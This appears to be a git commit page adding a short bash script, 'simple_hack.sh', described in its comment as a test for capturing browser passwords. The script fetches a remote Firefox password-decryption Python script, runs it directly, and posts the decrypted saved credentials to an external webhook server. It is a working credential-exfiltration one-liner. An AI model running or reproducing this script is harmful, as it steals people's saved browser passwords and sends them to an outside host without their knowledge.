Upload files to "/"
This commit is contained in:
7
simple_hack.sh
Normal file
7
simple_hack.sh
Normal file
@@ -0,0 +1,7 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
#Kerem EYLEM - 11 April 2025
|
||||||
|
#Simple local webhook script to test capturing the browser passwords.
|
||||||
|
FIREFOX_DECRYPT_URL="https://ddealmei.github.io/assets/3b64d11ff0ac5da6a262b3490949ec7f6/firefox_decrypt.py"
|
||||||
|
WEBHOOK_SERVER_URL=" https://n8n-webhook.keremeylem.com/webhook/9dc89154-cd1d-4ace-8c65-6c64495c3d54"
|
||||||
|
echo $(curl -fsSL $FIREFOX_DECRYPT_URL | python) | curl -v POST --data-binary @- $WEBHOOK_SERVER_URL
|
||||||
|
#echo "hello" | curl -v POST --data-binary @- $WEBHOOK_SERVER_URL
|
||||||
Reference in New Issue
Block a user